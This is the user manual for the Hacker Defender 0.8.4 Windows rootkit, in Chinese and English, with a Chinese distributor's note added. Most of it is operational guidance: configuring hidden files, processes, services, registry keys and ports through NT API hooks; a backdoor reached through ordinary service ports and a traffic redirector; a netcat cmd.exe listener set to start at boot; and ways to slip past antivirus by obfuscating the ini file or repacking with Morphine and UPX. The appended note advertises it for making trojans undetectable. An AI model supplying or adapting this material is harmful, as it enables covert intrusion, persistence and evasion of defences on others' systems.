=============[ Hacker defender - 黑客守卫者0.8.4 - Chinese readme ]============
天天安全网中文翻译
------------------
www.ttian.net
作者: Holy_Father <holy_father@phreaker.net>
Ratter/29A <ratter@atlas.cz>
翻译: luoluo <luoluo@ttian.net>由于时间关系,翻译稿仅是初稿,无暇核
对,如有不当,在此致歉!
版本: 0.8.4
发布日期: 20.10.2003
主页: http://rootkit.host.sk
测试者: ch0pper <THEMASKDEMON@flashmail.com>
aT4r <at4r@hotmail.com>
phj34r <phj34r@vmatrics.net>
unixdied <0edfd3cfd9f513ec030d3c7cbdf54819@hush.ai>
rebrinak
GuYoMe
ierdna <ierdna@go.ro>
Afakasf <undefeatable@pobox.sk>
=====[ 1. 目录 ]===============================================================
1. 目录
2. 介绍
2.1 思路
2.2 用户协议
3. 使用方法
4. 配置文件
5. Backdoor后门
5.1 Redirector转向器
6. 技术问题
6.1 版本
6.2 API调用
6.3 已知的缺陷
7. 疑难解答
8. 文件
=====[ 2. 介绍 ]================================================================
黑客守卫者 (hxdef) 是针对Windows NT 4.0, Windows 2000 和 Windows XP
的一款系统工具。主程序由 Delphi 6 编写。新功能由汇编语言编写。驱动使用C语言。
Backdoor 和 Redirector 客户端绝大多数使用 Delphi 6.
程序使用了改进版的 LDE32:
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE
special edition for REVERT tool
version 1.05
程序还使用了 Superfast/Supertiny Compression/Encryption library:
Superfast/Supertiny Compression/Encryption library.
(c) 1998 by Jacky Qwerty/29A.
=====[ 2.1 思路 ]===============================================================
主要的思路是改写内存中所有正在运行的进程的一小部分字节。这种对于部分基本
模块的改写可以导致进程功能的改变。同时这种改写还必须维持系统和进程的运行稳定性。
程序必须想对于其它进程绝对隐藏。目前,用户可以通过本软件隐藏文件、进程、
系统服务、系统驱动、注册表键的键和键值、打开的端口以及虚构可用磁盘空间。程序同时
也在内存中伪装它所做的改动,并且隐身地控制被隐藏进程。程序安装隐藏后门(Backdoor)
,注册隐藏系统服务并且安装系统驱动。该后门(Backdoor)技术允许植入Redirector。
=====[ 2.2 用户协议 ]===========================================================
直至Version 1.0.0, hxdef 仍是免费软件。它允许自由传播但不允许修改,所有
拷贝必须包含原文所有文件(包括原文的说明文件)。唯一的例外是目标(以及目标计算机
的拥有者)自己不想知道这个拷贝。
此项目将自Version 1.0.0起开放源码 .
此外,作者声明不对用户使用本软件产生的一切后果负责。
=====[ 3. 使用方法]=============================================================
hxdef的使用方法非常简单:
>hxdef084.exe [ini文件名]
或
>hxdef084.exe [开关]
ini文件的缺省文件名为 EXENAME.ini,此处的 EXENAME是不包括后缀的主程序名。
当用户不指定 [ini文件名] 以及在使用 [开关] 的时侯,程序采用缺省ini文件名(例如:
hxdef084.ini)。
可以选择的[开关]有:
-:installonly - 仅安装服务,但不运行
-:refresh - 读取ini文件,更新设置
-:noservice - 不安装服务,正常运行
-:uninstall - 从内存卸载 hxdef 同时断开所有后门连接
终止hxdef服务目前也采用此命令
例如:
>hxdef084.exe -:refresh
此命令含义为:Hxdef 读取缺省的ini文件中的设置并准备运行。强烈推荐用户建立自己的
ini配置文件。有关ini文件中的设置参见第四部分。
开关 “-:refresh” 和 “-:uninstall” 只能从原来的exe文件呼出。也就是说,
你必须知道运行hxdef的原文件名和路径才能更新设置或者卸载它。
=====[ 4. Ini文件 ]=============================================================
ini文件必须包括下列九部分内容:
[Hidden Table]
[Root Processes]
[Hidden Services]
[Hidden RegKeys]
[Hidden RegValues]
[Startup Run],
[Free Space]
[Hidden Ports]
[Settings].
在 [Hidden Table], [Root Processes], [Hidden Services] 和 [Hidden
RegValues] 中,可以在字符串末尾(注意:仅是末尾)使用通配符“*”。在第一个星
号后的所有内容将被忽略。在第一个字符前以及末尾的字符后面的所有空格将被忽略。
例如:
[Hidden Table]
hxdef*
这将隐藏以“hxdef”开头的所有文件、目录和进程。
[Hidden Table] 是需要隐藏的文件、目录和进程的列表。所有列表上的文件和
目录将在文件管理器上消失。列表中的程序在任务列表中将不再显示。应确认主程序、
ini文件、后门以及驱动文件在此列表中。Root Processes是一个可以不受此影响的程序
列表。用户仍然也仅仅是可以通过它查看被隐藏的文件、目录和程序。在Root Processes
中你将暴露无遗。
[Hidden Services] 隐藏的服务和驱动文件列表。 在系统服务列表中的缺省服
务名为 HackerDefender084,系统驱动中的驱动器名为 HackerDefenderDrv084。这两个
名称均可以在ini文件配置中更改。
[Hidden RegKeys] 隐藏的注册表键名列表。在注册表中有四个缺省的注册键名:
HackerDefender084、HackerDefenderDrv084、LEGACY_HACKERDEFENDER084、LEGACY_
HACKERDEFENDERDRV084。如果用户修改服务或驱动名,必须同时修改此注册键名。前两个
键名对应于服务和驱动名。后面的两个键名是 LEGACY_Name。例如:假如你修改服务名为
BoomThisIsMySvc,那么此处的注册名就是 LEGACY_BOOMTHISISMYSVC。
[Hidden RegValues] 注册表键值隐藏列表。
[Startup Run] 随系统自启动程序列表。这些程序将和系统文件享有同样权限。
程序名与其说明和询问标签分开。不要使用 " 字符因为这样用户登陆后该程序将被终止。
尽量采用大众化和众所周知的名称。可用的快捷配置符如下:
%cmd% - 系统cmd命令和路径
(如: C:\winnt\system32\cmd.exe)
%cmddir% - 系统cmd目录
(如:C:\winnt\system32\)
%sysdir% - 系统目录
(如:C:\winnt\system32\)
%windir% - Windows安装目录
(如: C:\winnt\)
%tmpdir% - 系统缓存目录
(如:C:\winnt\temp\)
例如:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
netcat-shell随系统启动并在端口100监听。
2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
每次系统启动,在缓存目录中的starttime.txt(如:C:\winnt\temp\starttime.txt)文
件里保存时间纪录。(%TIME% 仅对 Windows 2000 以上系统有效)
[Free Space] 硬盘符和虚构的可用空间列表。格式为 X:NUM(X:是硬盘符,NUM
是需要增加进可用空间数的字节bytes)。
例如:
[Free Space]
C:123456789
这将增加大约 123 MB 虚构的可用空间到 C 盘。
[Hidden Ports] 需要从 OpPorts, FPort, Active Ports, Tcp View等端口查看
程序中隐藏的端口列表。这里可以有最多两行:
第一行是TCP:端口1,端口2,端口3....
第二行是UDP:端口1,端口2,端口3....
例如:
1)
[Hidden Ports]
TCP:8080,456
这将隐藏: 8080/TCP 和 456/TCP
2)
[Hidden Ports]
TCP:8001
UDP:12345
这将隐藏: 8001/TCP 和 12345/UDP
3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800
这将隐藏: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP(注意:这里TCP:这一行还
是要有的)
[Settings] 包括八组数据:
Password=
BackdoorShell=
FileMappingName=
ServiceName=
ServiceDisplayName=
ServiceDescription=
DriverName=
DriverFileName=
Password 可以设置16位密码,用于Backdoor 或者 Redirector。密码可以少于
16位,以空格补齐。
BackdoorShell 是由 Backdoor 在系统缓存目录中建立的系统工具(通常是cmd
.exe)的拷贝的名称。
FileMappingName 是共享内存名称,用于共享系统进程内存来存储本设置。
ServiceName 是系统服务名。
ServiceDisplayName 是系统服务显示名称。
ServiceDescription 是在系统服务说明中显示的内容。
DriverName 是 hxdef 驱动名。
DriverFileName 是 hxdef 驱动程序名。
例如:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender084
ServiceDisplayName=HXD Service 084
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv084
DriverFileName=hxdefdrv.sys
意思是密码 “hxdef-rulez”, 后门将拷贝系统工具(通常是cmd.exe)到缓存目录下的
“hxdef?.exe”。共享内存名为“_.-=[Hacker Defender]=-._”。服务名“HackerDefen
der084”,其显示名称为“HXD Service 084”,说明“poweful NT rootkit”。启动程序
名“HackerDefenderDrv084”。启动程序将储存于文件“hxdefdrv.sys”。
其它字符如 |, <, >, :, \, / 以及 " 除了在[Startup Run]、[Free Space]和
[Hidden Ports] 项目里以及 [Settings] 中第一个“=”号后面之外,将全部被忽略。 使
用特殊字符可以使你的ini文件逃过反病毒系统的监视。
例如:
[H<<<idden T>>a/"ble]
>h"xdef"*
等同于:
[Hidden Table]
hxdef*
更多的例子请参见 hxdef084.ini 和 hxdef084.2.ini。
除 [Settings] 和 [Startup Run]中之外的所有字符将不会有任何反应。
=====[ 5. Backdoor 后门]========================================================
系统内核调用部分API函数从网络接收数据包。假如接收包为256位密钥,密码和服
务验证确认,那么系统工具的拷贝将保存于缓存目录,它将替换原有的系统工具,而下一个
数据包将自动转发给新的被拷贝的系统工具。
由于系统内核调用所有系统进程,因此所有服务的TCP端口将全部成为后门。例如:
假如目标主机开放HTTP的80端口,那么这个端口也将是后门端口。除非这个端口是没有被关
联的系统进程打开的。此后门将仅适用于接收缓冲区大于等于256位的服务。不过这个要求对
于几乎所有标准服务,比如:Apache, IIS, Oracle等都是可以满足的。后门得以隐身是由于
它的数据包来自于正常的系统服务。因此你将无法从端口扫描查出它,并且轻易穿透防火墙。
除非对方是一个特殊的代理,能够将协议转向到比如FTP或者HTTP。
在IIS服务测试中发现HTTP服务器不会记录任何此类连接,FTP 和 SMTP 服务器仅纪
录连接终止。
因此如果你在IIS服务器运行hxdef,HTTP端口就是最好的后门!
bdcli084.exe用于连接此后门。
使用方法: bdcli084.exe 主机或IP 端口 密码
例 如:
>bdcli084.exe www.windowsserver.com 80 hxdef-rulez
Version 0.8.4 的客户端与较低版本不兼容。
=====[ 5.1 Redirector 转向器]===================================================
Redirector 基于Backdoor后门技术,第一个包与Backdoor相同。也就是说你可以使
用和Backdoor的同一端口。第二个包是Redirector的特定包。它由客户机的Redirector产生。
第一个包用以确定服务器和端口。
Redirector在以exe文件名为名称的ini的文件中保存其配置(因此缺省文件名为 rdr
bs084.ini)。如运行时此文件名不存在,它将自动建立。所有设置在控制台可以调整。
假如我们想在已安装此软件的服务器上运行Redirector,必须在本机上首先运行它。
然后通过控制台远程控制服务器的 hxdef。然后通过本地经密码验证连接远程机器。本版本的
连接速度限定为256kps。Redirector不是为了高速连接而设计的,它同时在被安装系统上做了
限制,并且仅适用于TCP协议。
本版由19种命令控制,命令说明在HELP命令中。启动时首先执行启动列表中的命令。
启动列表由SU开头的命令编辑。
Redirector 区分两种连接方式(HTTP 和其它)。假如连接方式为“其它”,数据包
将不做修改。假如是HTTP,此HTTP包头部将改写为目标服务器。Redirector的最大连接为1000。
Redirector 只在NT下才能实现全部功能:仅在NT下才能隐藏系统托盘图标;仅在NT下才能使用安静模式运行,并且不弹出任何对话框和图标,并且可以使用启动列表。
例如:
1) 获取端口信息
>MPINFO
No mapped ports in the list.
2) 添加 MPINFO 命令至启动列表并获去启动列表:
>SUADD MPINFO
>sulist
0) MPINFO
3) 使用HELP命令:
>HELP
Type HELP COMMAND for command details.
Valid commands are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL,
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using HTTP type.
usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET
SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]
4) 添加本地监听端口100,软件安装于 200.100.2.36端口80,目标服务器 www.google.com 端
口 80,连接密码 bIgpWd,连接采用 HTTP,目标服务器(www.google.com)IP地址-注意必须知
道IP地址-216.239.53.100:
>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com
命令ADD可以无参数运行,此例中我们输入了所有参数。
5) 现在重新检查端口信息:
>MPINFO
There are 1 mapped ports in the list. Currently 0 of them open.
6) 列出端口列表:
>LIST
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
7) 端口详细说明:
>DETAIL 0
Listening on port: 100
Mapping server address: 200.100.2.36
Mapping server port: 80
Target server address: 216.239.53.100
Target server port: 80
Password: bIgpWd
Port type: HTTP
Domain name for HTTP Host: www.google.com
Current state: CLOSED
8) 测试在目标上,此软件是否已经运行-200.100.2.36(并非必须的步骤):
>TEST 0
Testing 0) 200.100.2.36:80:bIgpWd - OK
假如测试失败,回应为:
Testing 0) 200.100.2.36:80:bIgpWd - FAILED
9) 在使用前端口是关闭的,我们通过OPEN命令打开它,我们也可以用CLOSE命令关闭端口,甚至
使用ALL参数对列表中的所有端口广播命令。
>OPEN 0
Port number 0 opened.
>CLOSE 0
Port number 0 closed.
or
>OPEN ALL
Port number 0 opened.
10) 保存当前设置和列表可使用SAVE命令,这将保存所有设置至ini文件(输入不含DIS参数的
EXIT命令也将保存设置):
>SAVE
Saved successfully.
现在你可以输入http://localhost:100/登陆了。如果无误,你会看见google主页是如何调
用的。
第一个包允许的延时是5秒。其它的包只能取决于双方的连接速度了。Redirector
大概256kBps。
=====[ 6. 技术问题 ]============================================================
此部分仅供测试者和开发者阅读。
=====[ 6.1 版本 ]===============================================================
TODO - unify backdoor, redirector and file manager
- write new better backdoor
- backdoor proxy support
- hiding in remote sessions (netbios, remote registry)
- hidden memory type change (advance memory hiding)
- hook NtNotifyChangeDirectoryFile
0.8.4 + hook of NtCreateFile and NtOpenFile to hide file operations
+ hxdef mailslot name is dynamic
+ switch -:uninstall for removing and updating hxdef
+ -:refresh can be run from original .exe file only
+ new readme - several corrections, more information, faq
+ shortcuts for [Startup Run]
+ free space cheating via NtQueryVolumeInformationFile hook
+ open ports hiding via NtDeviceIoControlFile hook
+ much more info in [Comments] in inifile
+ supporting Ctrl+C in backdoor session
+ FileMappingName is an option now
+ Root Processes running on the system level
+ handles hiding via NtQuerySystemInformation hook class 16
+ using system driver
+ antiantivirus inifile
+ more stable on Windows boot and shutdown
+ memory hiding improved
- found bug in backdoor client when pasting data from clipboard
x found and fixed increasing pid bug fixed via NtOpenProcess hook
x found and fixed bug in NtReadVirtualMemory hook
x found and fixed several small bugs
x found and fixed backdoor shell name bug fix
0.7.3 + direct hooking method
+ hiding files via NtQueryDirectoryFile hook
+ hiding files in ntvdm via NtVdmControl hook
+ new process hooking via NtResumeThread hook
+ process infection via LdrInitializeThunk hook
+ reg keys hiding via NtEnumerateKey hook
+ reg values hiding via NtEnumerateValueKey hook
+ dll infection via LdrLoadDll hook
+ more settings in inifile
+ safemode support
+ masking memory change in processes via NtReadVirtualMemory hook
x fixed debugger bug
x fixed w2k MSTS bug
x found and fixed zzZ-service bug
0.5.1 + never more hooking WSOCK
x fixed bug with MSTS
0.5.0 + low level redir based on backdoor technique
+ password protection
+ name of inifile depends on exefile name
+ backdoor stability improved
- redirectors conection speed is limited about 256 kBps,
imperfect implementation of redirector,
imperfect design of redirector
- found chance to detect rootkit with symbolic link objects
- found bug in connection with MS Termnial Services
- found bug in hidding files in 16-bit applications
x found and fixed bug in services enumeration
x found and fixed bug in hooking servers
0.3.7 + possibility to change settings during running
+ wildcard in names of hidden files, process and services
+ possibility to add programs to rootkit startup
x fixed bug in hidding services on Windows NT 4.0
0.3.3 + stability realy improved
x fixed all bugs for Windows XP
x found and fixed bug in hiding in registry
x found and fixed bug in backdoor with more clients
0.3.0 + connectivity, stability and functionality of backdoor improved
+ backdoor shell runs always on system level
+ backdoor shell is hidden
+ registry keys hiding
x found and fixed bug in root processes
- bug in XP after reboot
0.2.6 x fixed bug in backdoor
0.2.5 + fully interactive console
+ backdoor identification key is now only 256 bits long
+ improved backdoor installation
- bug in backdoor
0.2.1 + always run as service
0.2.0 + system service installation
+ hiding in database of installed services
+ hidden backdoor
+ no more working with windows
0.1.1 + hidden in tasklist
+ usage - possibility to specify name of inifile
x found and then fixed bug in communication
x fixed bug in using advapi
- found bug with debuggers
0.1.0 + infection of system services
+ smaller, tidier, faster code, more stable program
x fixed bug in communication
0.0.8 + hiding files
+ infection of new processes
- can't infect system services
- bug in communication
=====[ 6.2 API调用 ]============================================================
List of API functions which are hooked:
Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (class 5 a 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.NtLdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtOpenFile
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA
=====[ 6.3 Known bugs ]=========================================================
There is one known bug in this version.
1)
Backdoor client may crash when you paste more data from clipboard using
rigth click to the console or using console menu. You can still paste the data
from clipboard using Ctrl+Ins, Shift+Ins if the program running in the console
supports this.
If you think you find the bug please report it to the public board
(or to betatesters board if you are betatester) or on <rootkit@host.sk>.
But be sure you've read this readme, faq section, todo list and the board and
you find nothing about what you want to write about before you write it.
=====[ 7. Faq ]=================================================================
Because of many simple questions on the board I realize to create a faq
section in this readme. Before you ask about anything read this readme twice
and take special care to this section. Then read old messages on the board
and after then if you still think you are not able to find an answer for your
question you can put it on the board.
The questions are:
1) I've download hxdef, run it and can't get a rid of it. How can I uninstall
it if I can't see its process, service and files?
2) Somebody hacked my box, run hxdef and I can't get a rid of it. How can I
uninstall it and all that backdoors that were installed on my machine?
3) Is this program detected by antivirus software? And if yes, is there any way
to beat it?
4) How is that I can't connect to backdoor on ports 135/TCP, 137/TCP, 138/TCP,
139/TCP or 445/TCP when target box has them open?
5) Is there any way to have hidden process which file on disk is visible?
6) How about hiding svchost.exe and others I can see in tasklist?
7) I'm using DameWare and I can see all your services and all that should be
hidden. Is this the bug?
8) But anyone can see my hidden files via netbios. What should I do?
9) Backdoor client is not working. Everything seems ok, but after connecting
I can't type anything and the whole console screen is black. What should I do?
10) When will we get the new version?
11) net.exe command can stop hidden services, is this the bug?
12) Is there any way to detect this rootkit?
13) So, how is it difficult to detect hxdef. And did somebody make a proggie
that can do it?
14) So, how can I detect it?
15) Does the version number which starts with 0 mean that it is not stable
version?
16) When will you publish the source? I've read it will be with the version
1.0.0, but when?
17) I want to be the betatester, what should I do?
18) Is it legal to use hxdef?
19) Is it possible to update machine with old hxdef with this version? Is it
possible without rebooting the machine?
20) Is it possible to update machine with this version of hxdef with a newer
version I get in future? Is it possible without rebooting?
21) Is it better to use -:uninstall or to use net stop ServiceName?
22) I really love this proggie. Can I support your work with a little donation?
23) Is there any chance to hide C:\temp and not to hide C:\winnt\temp?
24) I can see the password in inifile is plaintext! How is this possible?
25) If I have a process that is in Hidden Table and it listens on a port, will
this port be automatically hidden or should I put it to Hidden Ports?
Now get the answers:
1)
Q: I've download hxdef, run it and can't get a rid of it. How can I uninstall
it if I can't see its process, service and files?
A: If you left default settings you can run shell and stop the service:
>net stop HackerDefender084
Hxdef is implemented to uninstall completely is you stop its service. This does
the same as -:uninstall but you don't need to know where hxdef is.
If you changed ServiceName in inifile Settings, type this in your shell:
>net stop ServiceName
where ServiceName stands for the value you set to ServiceName in inifile.
If you forgot the name of the service you can boot your system from CD
and try to find hxdef inifile and look there for ServiceName value and then
stop it as above.
2)
Q: Somebody hacked my box, run hxdef and I can't get a rid of it. How can I
uninstall it and all that backdoors that were installed on my machine?
A: Only 100% solution is to reinstall your Windows. But if you want to do this
you'll have to find the inifile like in question 1) above. Then after
uninstalling hxdef from your system go through inifile and try to find all
files that match files in Hidden Table. Then you should verify those files
and delete them.
3)
Q: Is this program detected by antivirus software? And if yes, is there any way
to beat it?
A: Yes, and not only the exefile is detected, few antivirus systems also
detect inifile and also driver file may be detected. The answer for second
question here is yes, you can beat it quite easily. On hxdef home site you can
find a tool called Morphine. If you use Morphine on hxdef exefile you will get
a new exefile which can't be detected with common antivirus systems. Inifile
is also designed to beat antivirus systems. You can add extra characters to it
to confuse antivirus systems. See 4. Inifile section for more info. Also see
included inifiles. There are two samples that are equal, but the first one is
using extra characters so it can't be detected by common antivirus systems.
Probably the best way is to use UPX before you use Morphine. UPX will reduce
the size of hxdef exefile and Morphine will make the antiantivirus shield.
See Morphine readme for more info about it.
4)
Q: How is that I can't connect to backdoor on ports 135/TCP, 137/TCP, 138/TCP,
139/TCP or 445/TCP when target box has them open?
A: As mentioned in 5. Backdoor section of this readme backdoor need server
with incomming buffer larger or equal to 256 bits. And also system ports may
not work. If you have a problem with find open port that works you can simply
run netcat and listen on your own port. You should add this netcat port to
Hidden Ports in inifile then.
5)
Q: Is there any way to have hidden process which file on disk is visible?
A: No. And you also can't have a hidden file on disk of process which is
visible in the task list.
6)
Q: How about hiding svchost.exe and others I can see in tasklist?
A: This is really bad idea. If you hide common system processes your Windows
can crash very soon. With hxdef you don't need to name your malicious files
like svchost.exe, lsass.exe etc. you can name it with any name and add this
name to Hidden Table to hide them.
7)
Q: I'm using DameWare and i can see all your services and all that should be
hidden. Is this the bug?
A: Nope. DameWare and others who use remote sessions (and or netbios) can see
hidden services because this feature is not implemented yet. It's a big
difference between the bug and not implemented. See todo list on the web for
things that are not implemented yet.
8)
Q: But anyone can see my hidden files via netbios. What should I do?
A: Put your files deeply into the system directories or to directories that are
not shared.
9)
Q: Backdoor client is not working. Everything seems ok, but after connecting
I can't type anything and the whole console screen is black. What should I do?
A: You probably use bad port for connecting. Hxdef tries to detect bad ports
and disconnect you, but sometimes it is not able to detect you are using bad
port. So, try to use different port.
10)
Q: When will we get the new version?
A: Developers code this stuff in their free time. They take no money for this
and they don't want to get the money for this. There are only two coders right
now and we think this is enough for this project. This mean coding is not as
fast as microsoft and you should wait and don't ask when the new version will
be released. Unlike microsoft our product is free and we have good betatesters
and we test this proggie a lot, so our public version are stable.
11)
Q: net.exe command can stop hidden services, is this the bug?
A: Nope. It is not a bug, it is the feature. You still have to know the name
of the service you want to stop and if it is hidden the only who can know it
is the rootkit admin. Don't be scared this is the way how to detect you.
12)
Q: Is there any way to detect this rootkit?
A: Yes. There are so many ways how to detect any rootkit and this one is not
(and can't be) exception. Every rootkit can be detected. Only questions here
are how is it difficult and did somebody make a proggie that can do it?
13)
Q: So, how is it difficult to detect hxdef. And did somebody make a proggie
that can do it?
A: It is very very easy to detect this, but I don't know special tool that can
tell you that there is hxdef on your machine rigth now.
14)
Q: So, how can I detect it?
A: I won't tell you this :)
15)
Q: Does the version number which starts with 0 mean that it is not stable
version?
A: No, it means that there are few things that are not implemented yet and that
the source is closed and under development.
16)
Q: When will you publish the source? I've read it will be with the version
1.0.0, but when?
A: I really don't know when. There are several things I want to implement
before releasing 1.0.0. It can take a six months as well as a year or longer.
17)
Q: I want to be the betatester, what should I do?
A: You should write me the mail about how can you contribute and what are your
abilities for this job and your experiences with betatesting. But the chance to
be a new betatester for this project is quite low. Right now we have enough
testers who do a good job. No need to increase the number of them.
18)
Q: Is it legal to use hxdef?
A: Sure it is, but hxdef can be easily misused for illegal activities.
19)
Q: Is it possible to update machine with old hxdef with this version? Is it
possible without rebooting the machine?
A: It isn't possible without rebooting the machine, but you can update it when
you do a manual uninstall of that old version, reboot the machine and install
the new version.
20)
Q: Is it possible to update machine with this version of hxdef with a newer
version I get in future? Is it possible without rebooting?
A: Yes! You can use -:uninstall to totaly remove this version of hxdef without
rebooting. Then simply install the new version.
21)
Q: Is it better to use -:uninstall or to use net stop ServiceName?
A: The prefered way is to use -:uninstall if you have the chance. But net stop
will also does the stuff.
22)
Q: I really love this proggie. Can I support your work with a little donation?
A: We don't need it, but we will be you give your money to any of those
beneficent organisations in your country and write us the mail about it.
23)
Q: Is there any chance to hide C:\temp and not to hide C:\winnt\temp?
A: No. Create your own directory with a specific name and put it to the Hidden
Table.
24)
Q: I can see the password in inifile is plaintext! How is this possible?
A: You migth think this is quite unsecure way to store password but if you hide
your inifile nobody can read it. So, it is secure. And it is easy to change
anytime and you can use -:refresh to change the password easily.
25)
Q: If I have a process that is in Hidden Table and it listens on a port, will
this port be automatically hidden or should I put it to Hidden Ports?
A: Only hidden ports are those in Hidden Ports list. So, yes, you should put it
in to Hidden Ports.
=====[ 8. Files ]===============================================================
An original archive of Hacker defender v0.8.4 contains these files:
hxdef084.exe 70 144 b - program Hacker defender v0.8.4
hxdef084.ini 3 872 b - inifile with default settings
hxdef084.2.ini 3 695 b - inifile with default settings, variant 2
bdcli084.exe 26 624 b - backdoor client
rdrbs084.exe 49 152 b - redirectors base
readmecz.txt 34 639 b - Czech version of readme file
readmeen.txt 35 174 b - this readme file
===================================[ End ]======================================
软件介绍:Hacker Defender (中文名:黑客守卫者),内核级后门软件,用户可以通过本软件隐藏文件、进程、系统服务、系统驱动、注册表键的键和键值、打开的端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐身地控制被隐藏进程。程序安装隐藏后门,注册隐藏系统服务并且安装系统驱动。该后门技术允许植入Redirector。鉴于参数过多,不推荐新手使用,内有详细中文说明。
我再废话一句:黑客守卫者 在半条命2源码泄漏事件中扮演着重要的角色,具体怎么做大家自己想咯···
大家可以用这个程序来保护自己的木马达到免杀,即使原来被杀,使用hxdef后也无法清除了。是最简便免杀的方法,使用说明里面有了。
顺便说,KV无论如何也无法找到他的驱动···KV变得弱了,瑞星内存只能查,不能杀~卡巴沉默了
该程序启动的时候会有驱动无效的提示,不用理会。
查看该程序是否启动,请新建一个“hxdef.txt”,看其是否消失。若已经消失,说明程序正常工作。
程序在Windows2000 Professional和Windows XP Professional上测试通过。
目前过国内所有AV
附带说明:
install.bat是默认的安装启动程序
uninstall.bat是默认的卸载程序
直接打开hxdef.exe是没有反映的,必须用这个命令 “hxdef.exe 配置文件.ini”
运行后,hxdef.exe和hxdef.ini会消失,表明程序已经正常运行
卸载后,文件会重新显示
软件介绍:Hacker Defender 0.8.4,内核级后门软件,用户可以通过本软件隐藏文件、进程、系统服务、系统驱动、注册表键的键和键值、打开的端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐身地控制被隐藏进程。程序安装隐藏后门,注册隐藏系统服务并且安装系统驱动。该后门技术允许植入Redirector。鉴于参数过多,不推荐新手使用,内有详细中文说明。 |
